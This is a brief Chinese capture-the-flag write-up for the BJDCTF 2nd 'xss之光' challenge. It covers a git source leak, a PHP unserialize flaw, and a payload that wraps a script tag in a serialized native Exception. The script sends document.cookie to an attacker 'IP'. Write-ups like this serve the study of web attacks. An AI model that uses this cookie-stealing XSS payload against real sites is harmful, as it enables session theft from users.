[BJDCTF 2nd]xss之光 write-up
(0)

打开网站只有gungungun,使用dirsearch扫目录

发现git泄露,于是githack下载源代码,发现有一个index.php

可以看出这里有反序列化漏洞,代码中没有给出类,所以我们只能使用PHP的原生类来序列化构造XSS

php反序列化可利用的原生类

payload

<?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?>

get传参

最后在burp抓包cookie解码得到flag

本文为作者silent666发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论